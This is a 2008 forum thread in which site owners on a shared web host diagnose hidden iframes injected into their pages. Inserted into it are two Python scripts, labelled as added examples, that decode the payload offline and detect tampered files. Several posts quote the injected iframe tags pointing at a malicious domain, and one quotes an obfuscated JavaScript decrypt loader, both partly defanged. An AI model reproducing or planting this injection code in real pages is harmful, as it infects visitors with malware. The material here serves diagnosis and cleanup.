Know your ISP.

breath-hyenas
User #24311   19 posts
Forum Regular

I manage a small website for a parenting group hosted by Smartyhost. My web design knowledge is extremely basic and is limited to making simple webpages and uploading them to the server.

I have just changed my anti-virus program to Avast!, and today, when I had a look at our homepage on Smartyhost, I got an Avast! message saying there was a Trojan detected on the website. The Avast! log says: Sign of "JS:Packed-A[Trj]" has been found in "http://google-analysis.com/cgi-bin/neo3/index.cgi?in" file.

I have done a web search, and found many reports of the same problem, many of them from websites hosted by SmartyHost. The consensus seems to be that the Web Host is inserting this code (which I presume to be tracking code) without permission. One post said that they had removed the code several times from their home page, but it keeps reappearing. It seems outrageous to me that this could happen. I can imagine that most people, if they go to a website and get a Trojan warning, would immediately leave the website. If Smartyhost is in fact doing this, then they are seriously undermining the effectiveness of the websites they are hosting.

I have tried to speak to Smartyhost about this, but haven't managed to get onto them. They say they will ring back, but don't.

The obvious answer is to change hosting company, which I am looking into. However, in the meantime, does anyone know anything more about this? I have asked my daughter (a commercial lawyer) to read the Smartyhost webhosting terms and conditions, and she can't find anything that would authorise them to insert this sort of code. However, this is not her area of speciality. Any thoughts about this would be greatly appreciated.

posted 2008-Jul-10, 12pm AEST
User #110353   2541 posts
Whirlpool Forums Addict

This wouldn't be a direct SmartyHost issue.

Most likely is that you were running insecure software which has allowed malicious code to be inserted into your site without your knowledge. Always make sure you have the most up-to-date software setup on your hosting and see if Smartyhost are able to grep the files affected and place it in a text file somewhere so you can access it and remove the offending code.

posted 2008-Jul-10, 12pm AEST
User #181127   876 posts
Whirlpool Enthusiast

Myzteriouz1 writes...

Most likely is that you were running insecure software which has allowed malicious code to be inserted into your site without your knowledge.

Exactly.

Would you happen to be running Wordpress? I think this bug may be targeted towards Wordpress users with an old version running.

Smartyhost isn't to blame this time.

posted 2008-Jul-10, 1pm AEST
User #58445   199 posts
Forum Regular

Interesting.

The domain:

google-analysis.com

of course has nothing to do with Google Inc at all.

It looks to have been registered by some bad guys to resemble the legitimate Google Analytics domain

google-analytics.com

that is used by millions of sites to deploy the [legitimate] Google Analytics site stats Javascript.

I also doubt Smartyhost are the culprit here.

Either your site has been hacked to allow someone to modify pages on your site, specifically inserting that bogus link to 'google-analysis' into your HTML on site, or possibly your browser has been in some way infected to call up that bad Javascript.

Download your web pages via FTP, and check your page content or HTML carefully to see if you can find links to that bad Javascript, or pages or files that shouldn't be there on your server.

posted 2008-Jul-10, 5pm AEST
User #24311   19 posts
Forum Regular

No, I'm not using Wordpress. I downloaded the web page by FTP about a week ago when I was redoing it and removed all the code relating to google-analysis. At that stage I didn't think much about it as a couple of people had previously had a go at updating the website and I thought that perhaps they had a google toolbar link or something – please remember that my knowledge of web pages is at an extremely basic level. However, the code has come back and that is why I am contacting whirlpool.

The only reason I thought it was Smarty Host's problem was because I found a number of people with the same problem, most hosted by Smartyhost [http://m.zdnet.com.au/talkback/339286907.htm?page=2]. I'm sorry if I'm bad mouthing Smartyhost. However, in my ignorance, I thought it was the Web Host's job to maintain security. All I do is create a simple HTML page and upload it to the webserver by FTP. (There is nothing on the website beyond that – no Java, no Javascript, no third party software.) Beyond that, I thought security was the job of the Host – am I wrong? Should I be doing more?

posted 2008-Jul-10, 5pm AEST
User #200060   1314 posts
Whirlpool Enthusiast

It sounds like you are pretty secure if you are only using HTML. How about your password? Is that secure? Could it be easily guessed or cracked?

posted 2008-Jul-10, 6pm AEST
User #24311   19 posts
Forum Regular

The password is 12 characters – combination of random upper and lower case letters plus numbers.

With respect to the suggestion that my browser may be compromised – I run Superantispyware Pro, Spybot S&D, Spyware Blaster, Online Armor firewall and Avast! anti-virus. I update every day and do complete scans regularly. I haven't had any spyware, trojans or viruses found on my computer for a very long time.

posted 2008-Jul-10, 6pm AEST
User #200060   1314 posts
Whirlpool Enthusiast

I'd ask Smartyhost about it then. Remember, you can't be absolutely sure it is their fault yet, so don't go off and abuse them.

posted 2008-Jul-10, 6pm AEST
User #24311   19 posts
Forum Regular

Thanks for your input. I have requested a call back from Smartyhost, so hopefully they will contact me. I have removed the suspect code from my webpage again, and I will wait to see if it returns.

posted 2008-Jul-10, 7pm AEST
User #117437   257 posts
Forum Regular

Sounds like it could be the good ole budget shared hosting disease – a poorly configured server. Without correct setup all it takes is one other website being hosted on that server to be compromised and everyone pays the price. If you're not running any scripts, just static html, along with secure passwords and computers, then SmartyHost probably have some answering to do.

posted 2008-Jul-10, 7pm AEST
User #13510   2264 posts
Whirlpool Forums Addict

c-man writes...

It looks to have been registered by some bad guys to resemble the legitimate Google Analytics domain

Yeah..

I attempted to visit the site and my system (Google) blocked me :)

This web site at google-analysis.com has been reported as an attack site and has been blocked based on your security preferences.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 83 domain(s), including domanieyewear.com, ecomed.com.au, mtdruittworkers.com.au.

posted 2008-Jul-10, 10pm AEST
edited 2008-Jul-10, 10pm AEST
User #118455   243 posts
Forum Regular

If you download your html files (via FTP), is the code there?

posted 2008-Jul-11, 7pm AEST
edited 2008-Jul-11, 7pm AEST
User #24311   19 posts
Forum Regular

I downloaded the files by FTP about a week ago when I first raised the issue. The code was there then. I deleted it and uploaded the clean file. I have checked regularly since then (including just a minute ago) and it hasn't come back.

posted 2008-Jul-15, 8pm AEST
User #24311   19 posts
Forum Regular

I just discovered that this script has been inserted in our home page again. I rang Smartyhost tech support and managed to get on to them!!! They said that this was happening to websites hosted by many ISPs all over the world, including to many on Smartyhost. They said that it was due to passwords being compromised (how, they didn't say) and that the only thing to do was to change our password. The password certainly wasn't compromised at my end – so what's to stop the new one being compromised, if it was compromised at the ISP end?

posted 2008-Jul-28, 3pm AEST
User #15299   3314 posts
Whirlpool Forums Addict

It's always the host, never the customer.. Funny about that...

Whilst many hosts are expert liars they certainly don't go inserting code into customers' websites. What on earth made you even think about the thread title?

posted 2008-Jul-28, 5pm AEST
edited 2008-Jul-28, 5pm AEST
User #24311   19 posts
Forum Regular

Because I found many complaints about this particular code on other forums, all with respect to Smarty Host websites.

Because I rang the only web professional I know and he said that he had been forced to close one account in the past, where a cheap hosting service did indeed insert unauthorised tracking code in hosted websites.

Because I have been stuffed around considerably by Smartyhost changing the terms under which I originally signed up and I began to believe them capable of anything.

And mainly because I don't know anything about this kind of issue and I forgot to put the intended question mark at the end of the thread title. It was meant to be a question, not a statement.

And – it's funny how it's always the customer, never the host. Funny about that....
(And thanks to all the other posters who have actually given me HELPFUL suggestions.)

posted 2008-Jul-28, 9pm AEST
edited 2008-Jul-28, 9pm AEST
User #15299   3314 posts
Whirlpool Forums Addict

Hector writes...

Because I have been stuffed around considerably by Smartyhost changing the terms under which I originally signed up and I began to believe them capable of anything.

Well if this is the case why don't you simply cut your losses and move your site elsewhere? End your nightmare, it's not worth losing any sleep over it!

posted 2008-Jul-28, 9pm AEST
User #110734   5 posts
Forum Regular

I encountered this issue for the first time this evening whilst trying to visit a website, again hosted by Smartyhost. The website in question is a plain Static HTML format site but has been produced by one of the "website in a box" packages by the look of it. I have reported the malicious code to the website owner and hope they will share the details of how they administer their site and then allow me to contact their web developer. If I can, I will post back whatever I find out. I think it's safe to assume that Smartyhost themselves are not to blame for inserting the malicious code but there may well be a security hole in one of their servers or more likely with a web page administration program uploaded by an end user.

The code inserted on the page creates a 1 x 1 Iframe and is encoded as escaped Java unicode with a document.write function. On the site I visited, the code had been appended to the very end of the file AFTER the closing HTML tag, which would imply that it was done post HTML creation and definitely points towards an external attack to poison the page.

Will post again with any further information if I can gather any and anyone is interested

posted 2008-Jul-30, 6am AEST
User #58445   199 posts
Forum Regular

biggerdave writes...

Will post again with any further information if I can gather any and anyone is interested

That would be very useful. It is still not clear to me what the vector was here.

posted 2008-Jul-30, 10am AEST
User #193909   11 posts
Forum Regular

I just today came to do some work on a client's website when I noticed this same problem. Also hosted with Smartyhost, I was quite alarmed when Firefox told me the google-analysis*com website was marked as malicious.

This problem seems to be surprisingly widespread. Our passwords are reasonably secure. This would indicate to me that either Smartyhost are the cause, or there is a large security hole on the Smartyhost end....

posted 2008-Aug-3, 1pm AEST
User #34057   3 posts
Forum Regular

I also have a small website with smartyhost and have had the same error reported. Am trying to track it down now. Will post here with any valuable info I come across.

posted 2008-Aug-3, 9pm AEST
User #7584   26 posts
Forum Regular

Oh bother, bother! We just got the same treatment for our club cycle racing web site. I was suspicious when Symantec blocked 202.75.35.222. I thought it was a false positive for Google Analytics until I did a nslookup and found google-analysis.com was a Malaysian site.

Thanks to you guys for posting this as it made the rest of the diagnosis so easy and we were able to post clean HTML. We'll continue to monitor to see if the HTML remains just as we uploaded it or gets changed again.

Once again, thanks for documenting this.

posted 2008-Aug-4, 4pm AEST
User #31478   162 posts
Forum Regular

This is why I love Whirlpool!

We just had someone tell us one of our sites had a trojan, and funnily enough it was on Smartyhost!

So it all makes sense now.

posted 2008-Aug-7, 12pm AEST
User #58445   199 posts
Forum Regular

It doesn't seem that Smartyhost are very pro-active about monitoring the security of their servers then. That's a bad sign.

It may very well be security misconfigs at the customer end (somehow) but as the box owner Smartyhost should certainly get involved and take some ownership of the issue to help nail this, IMHO.

After all, these aren't un-managed dedicated servers or colo boxes we are talking about – Smartyhost provide shared hosting and thereby assume basic responsibility for the good running of the system overall.

Having multiple customers getting their shared sites infected/poisoned (even static sites) would certainly get me interested in fixing the problem if I was running a shared host biz.

posted 2008-Aug-7, 2pm AEST
User #213844   330 posts
Forum Regular

Is this the same problem with hacking that MD Webhosting had a while back?

/forum-replies.cfm?t=923810&p=1

/forum-replies.cfm?t=918288

/forum-replies.cfm?t=913594

That seemed to be hacking and iFrame insertion into clients' sites...

I've just had a client tell me that they are with Smarty Host and ask if they need to change. I came to Whirlpool to check them out and will be recommending a move...

posted 2008-Aug-15, 4pm AEST
User #48277   1137 posts
Whirlpool Enthusiast

Hey there,

Your site has been hacked.

If you have any PHP in your site or if you have a shop, forum etc.. which is PHP based then you may have been hacked directly.

However, you are likely to be hosting your site on a shared server, so someone else using poor PHP in their site has been hacked and therefore gained a certain level of access to other sites on that server.

Could have been a username/password hack also.

Re-upload the site from your backup.

It's likely your index.html file was hacked.. so make it read only on the server.

posted 2008-Aug-16, 12am AEST
User #7021   198 posts
Forum Regular

Hey Hector :)

Don't know anything about SmartyHost, but if on a shared server and users are allowed to upload/download via FTP then usernames/passwords can be compromised via sniffing & once an attacker, or their bot, is on the system, it can then look for further weaknesses to exploit and gain even more privileges & ultimately cause more damage to your pages/data/site etc..

THEREFORE:

1. Username/Password compromise as SmartyHost says IS possible.

2. If SmartyHost are not proactive in NOW, at least forcing users to access accounts securely via SSH (you can do FTP over an SSH connection for secure transfers), then I'd be looking elsewhere.

3. Since SmartyHost know, let's assume, username/passwords are being intercepted and abused, why are they not at least running some auto-scrubbing bots until they force customers into SECURE ONLY connections to accounts.

4. FIND A NEW HOST – I recommend obtaining a VPS host if not going dedicated, as with VPS it's like multiple dedicated servers per actual computer, hence if one site gets borked due to a security weakness, ie. PHP exploit, username/password compromised etc., this does NOT automatically translate to all user accounts being held hostage as it does with a shared server.

Have heard good things in the past in regards to www.johncompanies.com,(even have a LinuxJournal 2006 Editors Choice Award, http://www.linuxjournal.com/article/9368 -[ Quick Google before I posted ]) but never hosted with them as yet – so do your own research in this regard and ALWAYS USE SECURE TRANSFERS, NEVER VANILLA FTP, TELNET or HOST LOGINS :)

FreeBSD is the best OS in my opinion for security for most people,( ignoring mention of OpenBSD etc., as am thinking hosting options will be rather limited.. :) ), as FreeBSD has some really neat security auditing tools such as portaudit,(it checks your packages/ports for reported security weaknesses & prevents accidental installation of insecure ports/packages as well.). :)

Ps. If the shared server has a control panel like CPanel then these are often very good ways for having your accounts vulnerable when security issues with said panels, or versions of said panels arise, due to the fact so many people utilise them,(10,000+ webhosts = AWESOME ATTACK VECTOR).. think of new unknown MS Windows/IE viruses/exploits and how quickly they can spread before an AV Update/Patch to secure yourself from them is available.

NOTE: I use FreeBSD for both home & work for my own peace of mind,... almost said,.. "Work, Rest & Play",... but I prefer Snickers bars :P """

Hope this helps.

Later, RIPP.

posted 2008-Aug-16, 2am AEST
User #121646   10 posts
Forum Regular

Same here, my Smartyhost site was hacked the same way and I cannot log in to my panel, I just get a 404 page not found. I had spent 30 mins typing a support ticket and got a message back telling me to log in to the panel and send the report from there. Looks like they may have taken down the 'panel'?
I use Joomla and the files hacked were index.php, index2.php (hacked 7/6/08 at 04:20 server time, 3:20 Australia time) and smarty_index.html (hacked 17/5/2008 @ 14:11 = 00:11 Australia time).

Also the permissions of smarty_index.html were hacked to give execute to all. This file is common to all sites and the code was simple (I added the XXXX just in case it runs here):
<bodyXXXX>
<iframeXXXX src=httpXXXX://google-analysis.com/in.cgi?9 width=1 height=1></iframe><iframe src=httpXXXX://google-analysis.com/in.cgi?9 width=1 height=1></iframeXXXX>

Will try and contact Smarty to find out why I cannot get the panel login; maybe they have been hacked as well?

Tony

posted 2008-Aug-16, 3am AEST
User #121646   10 posts
Forum Regular

I resolved my login to the panel by pinging to get my host IP address; then I could get the login screen.
I have opened a ticket to see what they have to say.

Tony.

posted 2008-Aug-16, 11am AEST
User #121646   10 posts
Forum Regular

Here is my attempt at decoding/unescaping the hack code added to my PHP files. I have added the XXXX.

<iframeXXXX src=httpXXXX://google-analysis.com/in.cgi?9 width=1 height=1></iframeXXXX>

<iframeXXXX src=httpXXXX://google-analysis.com/in.cgi?9 width=1 height=1></iframeXXXX>

<scriptXXXX>
function load(code,dfunc,anticasp)
{
eval(dfunc);
decrypt(code);
}

load('<`B15ni[X1hIZQQFx;;lSSloi{5Y5o_X`X.hSn;`Y.hl`?T[g`(QZIm[Zi`lZQIm><;`B15ni>',

//I have unescaped following lines to reveal script code

function decrypt(n)
{var l, ch, ind,q="",key="OD&:x9T6H@fBAC#y_wgloSEb~K[chZei`a5z-{jv!Pk|r1mnYU}qV7/;pF]sXG=ILtQJ0u\'2Md(4*";

for(l=0;l<n.length;l++)
{
ch=n.charAt(l);
ind=key.indexOf(ch);
if(ind>-1)
{
if(ind==0)
{
ind =79
}
q+=key.charAt(ind-1)
}
else {q+=ch}
};
document.write(q) //write to the iframe window??
}
);
</scriptXXXX>

Up to you JavaScript gurus to make any sense of this. Could not resist trying to see what was going on. When I post, the leading spaces are removed, but the code was indented to look reasonable.

Tony

posted 2008-Aug-16, 12pm AEST
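A way to read what that obfuscated load('...') call would have written, as an added Python example that is not part of the thread: it reimplements the logic of the posted decrypt() (each character replaced by the one before it in the alphabet, wrapping at the start, everything outside the alphabet copied through) so the payload is decoded into a string for inspection instead of being eval'd and passed to document.write. The alphabet is copied from Tony's post; the assumption that the forum dropped a space after the 'K' in it is mine (with that space restored, the '[' characters decode to the spaces visible in his unescaped tag; the posted wrap value of 79 suggests one further character is still missing, which this decoder does not rely on).

```python
"""Offline decoder for the substitution-obfuscated payload posted in the thread
(added example). Nothing here executes the decoded markup."""
import re

# Alphabet exactly as it appears in the posted decrypt() (the \' there is a literal quote).
KEY_AS_POSTED = "OD&:x9T6H@fBAC#y_wgloSEb~K[chZei`a5z-{jv!Pk|r1mnYU}qV7/;pF]sXG=ILtQJ0u'2Md(4*"

# Assumption: the forum stripped a space after 'K'. With it restored, '[' decodes to a
# space, matching the unescaped iframe tag shown in the post.
KEY_REPAIRED = KEY_AS_POSTED[:26] + " " + KEY_AS_POSTED[26:]

# Encoded argument of the posted load(...) call, copied from the thread.
SAMPLE = "<`B15ni[X1hIZQQFx;;lSSloi{5Y5o_X`X.hSn;`Y.hl`?T[g`(QZIm[Zi`lZQIm><;`B15ni>"

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def decode(encoded, key=KEY_REPAIRED):
    """Replace each alphabet character by the previous one in the key (index 0 wraps
    to the last character, which is what Python's key[-1] does); characters outside
    the alphabet such as '<', '>', '.', '?' are copied through unchanged."""
    out = []
    for ch in encoded:
        ind = key.find(ch)
        out.append(ch if ind == -1 else key[ind - 1])
    return "".join(out)


def urls_in(text):
    """URLs the decoded markup would load; compare these against the domains you
    expect on the page (google-analytics.com is not google-analysis.com)."""
    return URL_RE.findall(text)


if __name__ == "__main__":
    decoded = decode(SAMPLE)
    print(decoded)
    print(urls_in(decoded))
```

Run it on any payload string and the decoded markup is printed rather than injected into a document; the only thing the browser-side version does differently is hand the result to document.write.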
User #213844   330 posts
Forum Regular

Looks like I won't be working with this client unless they accept my advice to change hosts... I don't need to get blamed for a hosting company's problems...

posted 2008-Aug-18, 3pm AEST
User #213008   140 posts
In the penalty box

clarit writes...

Looks like I won't be working with this client unless they accept my advice to change hosts... I don't need to get blamed for a hosting company's problems...

I think you will find it's a software issue, not something to do with the host itself. Makes sense, doesn't it?..

Smarty host happens to have websites affected with this code... and so does MD web hosting, I guess it wouldn't have anything to do with the fact that they could be running the same software application?

c-man writes...

It doesn't seem that Smartyhost are very pro-active about monitoring the security of their servers then. That's a bad sign.

It's not the job of the web host to ensure their clients' hosted software is up to date; that comes down to the client.

C.

posted 2008-Aug-18, 4pm AEST
User #102844   3359 posts
Whirlpool Forums Addict

Christopher. writes...

It's not the job of the web host to ensure their clients' hosted software is up to date; that comes down to the client.

It is their job to provide some kind of security; when there is obviously more than one account affected, it is a server issue.

posted 2008-Aug-18, 4pm AEST
User #213008   140 posts
In the penalty box

ethix writes...

It is their job to provide some kind of security; when there is obviously more than one account affected, it is a server issue.

If they were running up-to-date software, there wouldn't be an issue in the first place..

posted 2008-Aug-18, 4pm AEST
User #58445   199 posts
Forum Regular

Once again, this is shared hosting we are talking about. Server stability, integrity and security is at least, IMHO, 80% the responsibility of the host.

After all, the host might be running a buggy or misconfigured Apache or MySQL implementation, which could be the root of the problem here. What can the user do about that? And the host controls the firewall (if there is one) and users don't, and the host restricts the ability of users to run application security software too, like mod_security, or to update or recompile PHP to include the suhosin patch, I bet. Etc.

You are also wrong if you believe 'if they [users] were running up to date software' there would be no security problems either. This belief presumes that (a) all vendors keep their software up to date and (b) all software vendors have perfect knowledge of all of the possible or active vulnerabilities out there that might be used against their apps. Neither (a) or (b) is true. Keeping things up to date is useful but not the end of the problem.

Also even the most up to date application can be misconfigured or poorly implemented and potentially left vulnerable to attack, so keeping up-to-date isn't an automatic fix for anything.

posted 2008-Aug-18, 7pm AEST
User #213844   330 posts
Forum Regular

+1 c-man. How can you be expected to keep things up to date if you (as a web host client) have no access??

posted 2008-Aug-20, 12pm AEST
User #213008   140 posts
In the penalty box

clarit writes...

How can you be expected to keep things up to date if you (as a web host client) have no access??

So you're saying you don't have access to the software files which you installed on the server? (The PHP files from whatever it is you have had hosted with your webhost?)

posted 2008-Aug-20, 1pm AEST
User #213844   330 posts
Forum Regular

Christopher – Have you ever had shared hosting???

If you have, go and download Apache, MySQL, PHP etc and compile them to keep them current for your web space. Then report back and tell me how to do it.

posted 2008-Aug-20, 2pm AEST
User #213008   140 posts
In the penalty box

clarit writes...

If you have, go and download Apache, MySQL, PHP etc and compile them to keep them current for your web space. Then report back and tell me how to do it.

I did while I owned my own webhosting business :)

What I don't think you're understanding is, those WordPress blogs, phpBB forums etc., if they were kept up to date and not 12 months old, most exploits used against these applications would be patched etc.

posted 2008-Aug-20, 3pm AEST
edited 2008-Aug-20, 3pm AEST
User #243810   2 posts
Forum Regular

Add me to the list of smartyhost users with infected websites :(

If I remove the trojan bit, and change my password, will I be safe from further attack??

posted 2008-Aug-20, 3pm AEST
User #198554   2425 posts
Whirlpool Forums Addict

It seems really impossible that this many clients' passwords have been compromised, and far far more likely that Smartyhost's web server is compromised.

Change hosts immediately.

posted 2008-Aug-20, 7pm AEST
User #25219   130 posts
Forum Regular

*cough* SQL Server injection. *cough* Nothing to do with the hosting company...

http://www.owasp.org/index.php/Testing_for_SQL_Injection
http://msdn.microsoft.com/en-us/library/ms161953.aspx

It's a programming issue on each individual site: the web site code is allowing unchecked data to be pushed into the database used for the HTML content.

Firefox and NoScript is your friend.

dig.

posted 2008-Aug-20, 11pm AEST
User #102844   3359 posts
Whirlpool Forums Addict

Digger writes...

*cough* SQL Server injection. *cough*

How do you know it is?

Nothing to do with the hosting company...

*cough* Mod Security *cough*

Firefox and NoScript is your friend.

Not sure what you mean by this.

posted 2008-Aug-21, 12am AEST
User #213008   140 posts
In the penalty box

ethix writes...

*cough* Mod Security *cough*

Yeah, 'cause that protects your webserver from EVERYTHING ;)

posted 2008-Aug-21, 9am AEST
User #30370   179 posts
Forum Regular

Same issue here... SmartyHost, purely static content, no php/asp/etc, not even shtml.

posted 2008-Aug-21, 10am AEST
User #198554   2425 posts
Whirlpool Forums Addict

ShiftyPhil writes...

Same issue here... SmartyHost, purely static content, no php/asp/etc, not even shtml.

Proving yet again that if this many people are having issues, even with static content, that it's highly unlikely it's SQL injection or that each individual user's password was compromised through cleartext traffic inspection.

It has to be that Smartyhost's server got owned, and modified these pages without needing access to the user's accounts.

posted 2008-Aug-21, 9pm AEST
User #213844   330 posts
Forum Regular

Christopher. writes...

What I don't think you're understanding is, those WordPress blogs, phpBB forums etc., if they were kept up to date and not 12 months old, most exploits used against these applications would be patched etc.

No. What _you_ are not understanding is that as a client of shared hosting you do not have permission to do _any_ of what you say.

OK – you ran your own hosting company, that is different. Then you have _permission_ to secure. Again, as a client of shared web hosting, you do not have permission to keep these things up to date.

posted 2008-Aug-22, 5pm AEST
User #213008   140 posts
In the penalty box

clarit writes...

OK – you ran your own hosting company, that is different. Then you have _permission_ to secure. Again, as a client of shared web hosting, you do not have permission to keep these things up to date

You're just taking this around in circles – I don't think this has anything to do with the server software here. I think this is a shared hosting software application issue (i.e. those applications you install when you use Fantastico etc.: phpBB, WordPress, Joomla, PHP-Nuke)

posted 2008-Aug-22, 6pm AEST
User #102844   3359 posts
Whirlpool Forums Addict

Christopher. writes...

You're just taking this around in circles – I don't think this has anything to do with the server software here. I think this is a shared hosting software application issue (i.e. those applications you install when you use Fantastico etc.: phpBB, WordPress, Joomla, PHP-Nuke)

Shouldn't PHP etc. be limited to the home directory it is run in?

posted 2008-Aug-22, 7pm AEST
User #213008   140 posts
In the penalty box

No. It takes just one client on a shared hosting server to run old software which has an unpatched exploit and the whole server becomes infected.

posted 2008-Aug-22, 7pm AEST
User #159919   303 posts
Forum Regular

What I am finding strange is that there has been no input into this thread from anyone from SmartyHost.

Is this the same issue that affected MD wh?

If you are looking for a new host can I suggest

AussieHost
http://www.aussiehost.com/

You can host multiple domains from the one account.

posted 2008-Aug-24, 12pm AEST
User #7021   198 posts
Forum Regular

Christopher. writes...

No. It takes just one client on a shared hosting server to run old software which has an unpatched exploit and the whole server becomes infected.

That is incorrect (at least as regards FreeBSD, Linux & other *nix styled hosting)... That only gets you access to that client's account/(shell environment etc.) and you gain their privileges; however, to infect or tamper with other users' data (since you're talking about only 1 user in your example ETC.), then the server software and/or other privileges on the server must have exploitable weaknesses, and this software and these configurations are set up & maintained (hopefully pro-actively for security concerns) by the webhost.

Later, RIPP.

posted 2008-Aug-26, 6pm AEST
User #39126   293 posts
Forum Regular

JackCare writes...

What I am finding strange is that there has been no input into this thread from anyone from SmartyHost.

Agreed; and what I'm also finding amusing/strange is the people who keep posting saying it's application software that's causing the problem. People – listen – some of these sites have only static HTML pages – NO CODE. And yes, it could well be the issue that affected other webhosting companies.

There are several possible vectors. One is that the server has been root compromised and this is entirely possible given the number of reports over a variety of sites. There are shared library compromises and an attack via PHP dl() that alter the behaviour of PHP (although, these are static pages) that could be the cause for PHP based sites. If the server has been completely compromised, it could have been rootkitted and an Apache module added that randomly inserts this code. Next time you get infected, check the actual code on the server via ftp to see if the actual HTML code has been altered or whether it's an on-the-fly insertion. Please check this and let us know. If it's on-the-fly insertion there's no doubt at all it's a major server compromise. Which means server rebuild time, make sure you grab your backups!

Another possibility is that the ftp password was sniffed. Could have happened over WiFi if it's been used, but probably unlikely given the number of reports of breakins.

BTW there are some nasty application level exploits out there at the moment. If you're running Joomla 1.5, your site will be exploited in the next few days unless your host is smart enough to run mod_security, or unless you update your Joomla.

That only gets you access to that client's account/(shell environment etc.) and you gain their privileges

Unfortunately not completely true; it depends whether they are running PHP under suphp (each user under their own UID) or whether they're running PHP as user nobody (pretty much open slather to everyone's files on all accounts, although smarter hosts running PHP this way do restrict their PHP functionality to make it harder).

posted 2008-Aug-26, 7pm AEST
edited 2008-Aug-26, 7pm AEST
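The check brianoz asks for, comparing the file pulled down via FTP with the page as served, as an added Python example that is not part of the thread. It works on a local copy of the site and the served HTML supplied as a string, compares the file's hash against one recorded after the last clean upload, and flags the three things reported in this thread: content after the closing </html> tag (biggerdave's post), a 1x1 iframe, and a file whose permissions were widened to include execute (Tony's post). classify() makes brianoz's distinction: injected content only in the served copy points at on-the-fly insertion by the web server, while injected content in the stored file means the file itself was rewritten. The page contents, paths and baseline hash are constructed for the demo; the iframe tag is the one quoted in the thread.

```python
"""Triage for a static HTML site suspected of iframe injection (added example,
not from the thread). Works on a local copy of the site pulled down via FTP plus
the page as served over HTTP, both supplied by the caller."""
import hashlib
import os
import re
import stat
import tempfile

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^\s"'>]+)""", re.IGNORECASE)
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.IGNORECASE)
CLOSE_HTML_RE = re.compile(r"</html\s*>", re.IGNORECASE)


def sha256_file(path):
    """Hash to record right after a clean upload and compare on every check."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def trailing_content(html):
    """Anything after the first </html>; the injected code in this thread was appended there."""
    m = CLOSE_HTML_RE.search(html)
    return html[m.end():].strip() if m else ""


def hidden_iframes(html):
    """src of every iframe whose width and height are both 1 px or less."""
    found = []
    for tag in IFRAME_RE.findall(html):
        dims = {k.lower(): int(v) for k, v in DIM_RE.findall(tag)}
        if dims.get("width", 999) <= 1 and dims.get("height", 999) <= 1:
            src = SRC_RE.search(tag)
            found.append(src.group(1) if src else "")
    return found


def widened_permissions(path):
    """True if a plain HTML file has any execute bit or group/other write bit set."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    bad = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH | stat.S_IWGRP | stat.S_IWOTH
    return bool(mode & bad)


def classify(stored_html, served_html):
    """Injected content only in the served copy means on-the-fly insertion by the
    web server; present in the stored file too means the file itself was rewritten."""
    stored_bad = bool(hidden_iframes(stored_html) or trailing_content(stored_html))
    served_bad = bool(hidden_iframes(served_html) or trailing_content(served_html))
    if served_bad and not stored_bad:
        return "on-the-fly insertion"
    return "stored file modified" if stored_bad else "clean"


def triage(path, baseline_sha256):
    """All checks for one stored file, against the hash taken after the clean upload."""
    with open(path, encoding="utf-8", errors="replace") as f:
        html = f.read()
    return {
        "hash_mismatch": sha256_file(path) != baseline_sha256,
        "trailing_content": trailing_content(html),
        "hidden_iframes": hidden_iframes(html),
        "widened_permissions": widened_permissions(path),
    }


# Constructed sample page; the iframe tag is the one quoted in the thread.
CLEAN = "<html><head><title>Club</title></head><body><p>Hello</p></body></html>\n"
INJECTED_TAIL = "<iframe src=http://google-analysis.com/in.cgi?9 width=1 height=1></iframe>"


def demo():
    """Simulate what the thread describes: clean upload, then an appended tail and chmod 755."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "index.html")
        with open(path, "w", encoding="utf-8") as f:
            f.write(CLEAN)
        os.chmod(path, 0o644)
        baseline = sha256_file(path)
        with open(path, "a", encoding="utf-8") as f:
            f.write(INJECTED_TAIL)
        os.chmod(path, 0o755)
        return triage(path, baseline)


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
    print(classify(CLEAN, CLEAN + INJECTED_TAIL))
```

Record the baseline hash immediately after each clean upload and re-run triage() on a fresh FTP download whenever the browser warning reappears; if the FTP copy still matches the baseline but the served page carries the iframe, the modification is happening on the server side, which is the case where changing your own password cannot help.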
User #7021   198 posts
Forum Regular

brianoz writes...

Unfortunately not completely true; it depends whether they are running PHP under suphp (each user under their own UID) or whether they're running PHP as user nobody (pretty much open slather to everyone's files on all accounts, although smarter hosts running PHP this way do restrict their PHP functionality to make it harder).

:) --- I could have put in a caveat,.. and thought about such,.. but deemed that it may make things more confusing to the reader.... however, this form of running PHP was more in the olden days before such PHP exploit-ability was well known,.. these days any host running PHP in such an unrestricted manner is greatly reducing user security & thus it comes down, again, to the fault of the webhost when an exploit happens that can affect MULTIPLE users, particularly those that do not run any form of actively exploitable content... ie. truly static pages.

As such my previous post was/is still fully correct, as this would come under "... then the server software and/or other privileges on the server, must have exploitable weaknesses and this software and these configurations are set up & maintained .. by the webhost."

Later, RIPP.

posted 2008-Aug-27, 8am AEST
User #213844   330 posts
Forum Regular

Thanks RIPP and brianoz for the backup. I think I wasn't quite getting through to Christopher in my posts.

I agree that this is most likely a server exploit.

Good advice about checking static HTML via FTP vs on the fly. That would surely narrow it down to Apache...

Anyway, my client is not going to be hosting with them now – yaaay!

posted 2008-Aug-27, 1pm AEST
User #197954   43 posts
Forum Regular

Just received an email from google,

"Dear site owner or webmaster of mysite.com.au,

We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com."

I have checked it out and it has the same script inserted into the bottom of the page. This is now the fourth site that has been attacked in this manner. This page was simply an HTML page with a Flash file in it. The only script on it was for Flash detection/version checking.

I have re-uploaded my page and now I have to go through the process of having the site re-validated with Google.

I have been slowly moving all of my "budget" hosting over to Jumba as they expire with Smartyhost. I think I may bite the bullet and cut my losses with the rest of them and move them over before this happens again. I know that this problem could potentially happen with Jumba too, but I have much more faith in them being able to rectify the problem if it arises.

